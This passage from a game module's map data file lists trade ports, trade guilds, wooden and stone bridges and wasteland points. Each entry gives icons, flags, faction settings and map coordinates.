("tradeport83", "Rhodes", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (-77.66, -134.42), [], 225.0),
("tradeport84", "Mokpo", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (-1148.2, -116.14), [], 115.0),
("tradeport85", "Wenzhou", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (-1089.58, -39.26), [], 225.0),
("tradeport86", "Bordeaux", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (237.82, -251.74), [], 5.0),
("tradeport87", "Dublin", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (295.7, -372.86), [], 270.0),
("tradeport88", "Bremerhavan", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (136.5, -376.6), [], 40.0),
("tradeport89", "Odesa", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (-106.22, -266.62), [], 225.0),
("tradeport90", "Benghazi", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (9.08, -88.36), [], 55.0),
("tradeport91", "Jeddah", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (-197.64, 28.44), [], 100.0),
("tradeport92", "Gaza", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (-146.48, -80.9), [], 45.0),
("tradeport93", "Columbo", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (-642.28, 173.3), [], 100.0),
("tradeport94", "Bintulu", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (-1006.6, 209.14), [], 45.0),
("tradeport95", "Darwin", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (-1199.3, 363.54), [], 45.0),
("tradeport96", "Sipontum", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (54.8, -202.74), [], 235.0),
("tradeport97", "Massawa", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (-203.64, 90.0), [], 20.0),
("tradeport98", "Tortuga", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (1022.12, 43.54), [], 170.0),
("tradeport99", "Alger", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (195.08, -142.5), []),
("tradeport100", "Port Royal", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (1077.12, 65.84), [], 200.0),
("tradeport101", "Tsushima", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (-1183.9, -112.0), [], 225.0),
("tradeport102", "Shilin", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (-1097.08, -11.02), [], 25.0),
("tradeport103", "Jaffna", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (-643.94, 149.14), [], 155.0),
("tradeport104", "Mayotte", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (-262.54, 368.54), [], 135.0),
("tradeport105", "Mindelo", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (502.22, 73.54), [], 315.0),
("tradeport106", "San fernaldo", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (900.62, 141.98), [], 90.0),
("tradeport107", "Angra do heroismo", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (523.34, -165.38), [], 270.0),
("tradeport108", "Farsund", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (157.04, -453.92), [], 135.0),
("tradeport109", "Antalaha", icon_harbor|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (-319.72, 387.96), [], 315.0),
("tradeport_end", "tradeport end", icon_cantsee|pf_disabled|pf_is_static|pf_no_label|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (0.0, 0.0), []),
("tradeguild1", "Turpan", icon_house_exn|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (-744.84, -219.96), [], 145.0),
("tradeguild2", "Changzhou", icon_house_exn|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (-1046.84, -160.52), [], 15.0),
("tradeguild3", "Thai Nguyen", icon_house_exn|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (-926.28, 27.92), [], 265.0),
("tradeguild4", "Enshi", icon_house_exn|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (-966.36, -66.4), [], 115.0),
("tradeguild5", "Huelun", icon_house_exn|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (-1077.62, -304.6), [], 45.0),
("tradeguild6", "Fuxin", icon_house_exn|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (-1099.4, -207.96), [], 275.0),
("tradeguild7", "Gorgan", icon_house_exn|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (-364.96, -142.56), [], 35.0),
("tradeguild8", "Abadeh", icon_house_exn|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (-345.36, -76.36), [], 225.0),
("tradeguild9", "Adrar", icon_house_exn|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (232.96, -39.56), [], 95.0),
("tradeguild10", "Linz", icon_house_exn|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (73.64, -294.68), [], 175.0),
("tradeguild11", "Garrotxa", icon_house_exn|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (202.52, -210.12), [], 45.0),
("tradeguild12", "Ales", icon_house_exn|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (184.88, -236.04), [], 25.0),
("tradeguild13", "Brest", icon_house_exn|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (-28.84, -352.84), [], 75.0),
("tradeguild14", "Ternopil", icon_house_exn|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (-50.0, -313.08), [], 145.0),
("tradeguild15", "Al Bukamal", icon_house_exn|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (-217.36, -115.32), [], 325.0),
("tradeguild16", "Elverum", icon_house_exn|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (103.2, -507.44), [], 115.0),
("tradeguild17", "Shumen", icon_house_exn|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (-64.6, -224.6), [], 225.0),
("tradeguild18", "Ahbaz", icon_house_exn|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (-302.08, -78.08), [], 270.0),
("tradeguild19", "Dhaka", icon_house_exn|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (-758.08, 5.2), [], 75.0),
("tradeguild20", "Uliastai", icon_house_exn|pf_label_medium|pf_village, no_menu, pt_none, fac_tradeport, aggressiveness_0, ai_bhvr_hold, 0, (-831.4, -292.88), [], 195.0),
("tradeguild_end", "tradeguild end", icon_cantsee|pf_disabled|pf_is_static|pf_no_label|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (48.0, 48.0), []),
("bridge_1", "{!}1", icon_bridge_wood|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1304.0, -130.8), [], 335.0),
("bridge_2", "{!}2", icon_bridge_wood|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1174.2, -126.2), [], 90.0),
("bridge_3", "{!}3", icon_bridge_wood|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (1019.58, -267.12), [], 40.0),
("bridge_4", "{!}4", icon_bridge_wood|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1131.2, -186.2), [], 40.0),
("bridge_5", "{!}5", icon_bridge_wood|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1182.2, -211.2), [], 40.0),
("bridge_6", "{!}6", icon_bridge_wood|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1103.4, -196.94), [], 40.0),
("bridge_7", "{!}7", icon_bridge_wood|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1121.76, -217.25), [], 100.0),
("bridge_8", "{!}8", icon_bridge_wood|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1091.14, -216.18), []),
("bridge_9", "{!}9", icon_bridge_wood|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1220.28, -288.88), [], 70.0),
("bridge_10", "{!}10", icon_bridge_wood|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1084.14, -43.58), [], 145.0),
("bridge_11", "{!}11", icon_bridge_wood|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1084.18, -66.24), [], 45.0),
("bridge_12", "{!}12", icon_bridge_wood|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1000.22, -154.22), [], 80.0),
("bridge_13", "{!}13", icon_bridge_wood|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1048.32, -176.34), [], 140.0),
("bridge_14", "{!}14", icon_bridge_wood|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (1226.04, -177.54), [], 100.0),
("bridge_15", "{!}15", icon_bridge_wood|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (1253.8, -92.74), [], 105.0),
("bridge_16", "{!}16", icon_bridge_wood|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (1224.32, -95.52), [], 105.0),
("bridge_17", "{!}17", icon_bridge_wood|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (228.72, 82.76), [], 115.0),
("bridge_18", "{!}18", icon_bridge_wood|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (284.9, 102.96), [], 195.0),
("bridge_19", "{!}19", icon_bridge_wood|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (156.56, 185.86), [], 75.0),
("bridge_20", "{!}20", icon_bridge_wood|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-996.1, -86.88), [], 340.0),
("bridge_21", "{!}21", icon_bridge_wood|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-906.336, -126.5336), [], 45.0),
("bridge_22", "{!}22", icon_bridge_wood|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-924.72, -88.28), [], 280.0),
("bridge_23", "{!}23", icon_bridge_wood|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-935.28, -57.68), [], 45.0),
("bridge_24", "{!}24", icon_bridge_wood|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-899.9, -37.98), [], 260.0),
("bridge_25", "{!}25", icon_bridge_wood|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-920.16, 29.38), [], 95.0),
("bridge_26", "{!}26", icon_bridge_wood|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1059.24, -110.36), [], 330.0),
("bridge_27", "{!}27", icon_bridge_wood|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-984.34, -168.48), [], 75.0),
("bridge_28", "{!}28", icon_bridge_wood|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-932.8, -164.68), [], 75.0),
("bridge_29", "{!}29", icon_bridge_wood|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-988.78, -50.68), [], 30.0),
("bridge_30", "{!}30", icon_bridge_wood|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1023.22, -14.46), [], 45.0),
("bridge_31", "{!}31", icon_bridge_wood|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1178.78, -131.38), []),
("bridge_32", "{!}32", icon_bridge_wood|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1037.48, -2.62), [], 100.0),
("bridge_33", "{!}33", icon_bridge_wood|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1074.86, -93.6), [], 135.0),
("bridge_34", "{!}34", icon_bridge_wood|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-895.78, -397.18), [], 110.0),
("bridge_35", "{!}35", icon_bridge_wood|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-672.32, -319.64), [], 160.0),
("bridge_36", "{!}36", icon_bridge_wood|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-644.24, -231.7), [], 170.0),
("bridge_37", "{!}37", icon_bridge_wood|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-451.824, -186.734), [], 115.0),
("bridge_38", "{!}38", icon_bridge_wood|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-490.22, -242.38), [], 330.0),
("bridge_39", "{!}39", icon_bridge_wood|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-338.98, -279.98), [], 260.0),
("bridge_40", "{!}40", icon_bridge_wood|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-267.46, -297.68), []),
("bridge_41", "{!}41", icon_bridge_wood|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-297.22, -359.04), [], 90.0),
("bridge_42", "{!}42", icon_bridge_wood|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-218.24, -284.58), [], 40.0),
("bridge_43", "{!}43", icon_bridge_wood|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-35.84, -431.28), [], 165.0),
("bridge_44", "{!}44", icon_bridge_wood|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-144.64, -301.52), [], 145.0),
("bridge_45", "{!}45", icon_bridge_wood|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (21.82, -379.28), [], 90.0),
("bridge_46", "{!}46", icon_bridge_wood|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (73.66, -377.06), [], 90.0),
("bridge_47", "{!}47", icon_bridge_wood|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (7.54, -249.88), [], 135.0),
("bridge_48", "{!}48", icon_bridge_wood|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (136.22, -270.24), [], 20.0),
("bridge_49", "{!}49", icon_bridge_wood|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (263.62, -217.34), [], 105.0),
("bridge_50", "{!}50", icon_bridge_wood|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-106.66, -72.68), [], 100.0),
("bridge_51", "{!}51", icon_bridge_wood|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-112.92, -59.76), [], 90.0),
("bridge_52", "{!}52", icon_bridge_wood|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-116.32, -26.08), [], 120.0),
("bridge_53", "{!}53", icon_bridge_wood|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-129.32, -8.72), [], 105.0),
("bridge_54", "{!}54", icon_bridge_wood|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-103.04, 50.54), [], 95.0),
("bridge_55", "{!}55", icon_bridge_wood|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-517.5, -9.3), [], 90.0),
("bridge_56", "{!}56", icon_bridge_wood|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-549.28, -63.08), [], 75.0),
("bridge_57", "{!}57", icon_bridge_wood|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-597.46, 14.52), [], 100.0),
("bridge_58", "{!}58", icon_bridge_wood|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-573.18, 25.74), []),
("bridge_59", "{!}59", icon_bridge_wood|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-626.04, 85.68), [], 100.0),
("bridge_60", "{!}60", icon_bridge_wood|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-671.64, -10.34), [], 170.0),
("bridge_61", "{!}61", icon_bridge_wood|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-760.96, 13.86), [], 105.0),
("bridge_62", "{!}62", icon_bridge_wood|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-749.08, -8.16), [], 85.0),
("bridge_63", "{!}63", icon_bridge_wood|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-811.62, 27.4), [], 130.0),
("bridge_64", "{!}64", icon_bridge_wood|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-805.78, 35.38), [], 105.0),
("bridge_65", "{!}65", icon_bridge_wood|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-928.08, 107.04), [], 100.0),
("bridge_wood_end", "Bridge wood end", icon_cantsee|pf_disabled|pf_is_static|pf_no_label|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (64.0, 52.0), []),
("bridge_stone_1", "{!}1", icon_bridge_stone|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1157.4, -153.8), []),
("bridge_stone_2", "{!}2", icon_bridge_stone|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1018.14, -121.12), [], 20.0),
("bridge_stone_3", "{!}3", icon_bridge_stone|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-964.82, -110.16), [], 75.0),
("bridge_stone_4", "{!}4", icon_bridge_stone|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-944.96, -113.62), [], 340.0),
("bridge_stone_5", "{!}5", icon_bridge_stone|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-967.64, -114.16), []),
("bridge_stone_6", "{!}6", icon_bridge_stone|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-985.38, -69.88), [], 330.0),
("bridge_stone_7", "{!}7", icon_bridge_stone|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1043.0, -91.82), [], 20.0),
("bridge_stone_8", "{!}8", icon_bridge_wood|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (8.3, -356.58), [], 170.0),
("bridge_stone_9", "{!}9", icon_bridge_wood|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-63.92, -235.78), [], 5.0),
("bridge_stone_10", "{!}10", icon_bridge_wood|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (7.84, -250.62), [], 100.0),
("bridge_stone_11", "{!}11", icon_bridge_wood|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (71.02, -262.86), [], 90.0),
("bridge_stone_12", "{!}12", icon_bridge_wood|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (88.0, -280.1), []),
("bridge_stone_13", "{!}13", icon_bridge_wood|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (174.28, -231.68), [], 90.0),
("bridge_stone_14", "{!}14", icon_bridge_wood|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (106.5, -369.9), [], 140.0),
("bridge_stone_15", "{!}15", icon_bridge_wood|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (178.56, -345.4), [], 155.0),
("bridge_stone_16", "{!}16", icon_bridge_wood|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (144.88, -321.42), [], 120.0),
("bridge_stone_17", "{!}17", icon_bridge_wood|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (221.92, -191.98), [], 10.0),
("bridge_stone_18", "{!}18", icon_bridge_wood|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (319.12, -198.68), [], 170.0),
("bridge_stone_19", "{!}19", icon_bridge_wood|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (327.8, -166.72), [], 40.0),
("bridge_stone_20", "{!}20", icon_bridge_wood|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (283.28, -179.12), [], 10.0),
("bridge_stone_21", "{!}21", icon_bridge_wood|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-252.92, -92.58), [], 100.0),
("bridge_stone_22", "{!}22", icon_bridge_wood|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-262.32, -96.42), [], 160.0),
("bridge_stone_23", "{!}23", icon_bridge_wood|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-299.32, -65.58), [], 100.0),
("bridge_stone_24", "{!}24", icon_bridge_wood|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-624.6, -24.38), [], 10.0),
("bridge_stone_25", "{!}25", icon_bridge_wood|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (292.72, -148.4), [], 30.0),
("bridge_stone_26", "{!}26", icon_bridge_wood|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (226.92, -279.34), [], 175.0),
("bridge_stone_27", "{!}27", icon_bridge_wood|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (211.42, -305.06), [], 150.0),
("bridge_stone_28", "{!}28", icon_bridge_wood|pf_is_static|pf_always_visible|pf_no_label, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-1147.36, -169.28), [], 20.0),
("bridge_stone_end", "Bridge stone end", icon_cantsee|pf_disabled|pf_is_static|pf_no_label|pf_hide_defenders, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (52.0, 64.0), []),
("wasteland1", "Wasteland Santo domingo", icon_point_mark|pf_label_medium|pf_village, no_menu, pt_none, fac_hot_points, aggressiveness_0, ai_bhvr_hold, 0, (997.9, 59.66), []),
("wasteland2", "Wasteland South hedland", icon_point_mark|pf_label_medium|pf_village, no_menu, pt_none, fac_hot_points, aggressiveness_0, ai_bhvr_hold, 0, (-1068.16, 446.68), []),
("wasteland3", "Wasteland Darwin", icon_point_mark|pf_label_medium|pf_village, no_menu, pt_none, fac_hot_points, aggressiveness_0, ai_bhvr_hold, 0, (-1201.28, 366.12), []),
("wasteland4", "Wasteland Nashville", icon_point_mark|pf_label_medium|pf_village, no_menu, pt_none, fac_hot_points, aggressiveness_0, ai_bhvr_hold, 0, (1177.16, -134.92), []),
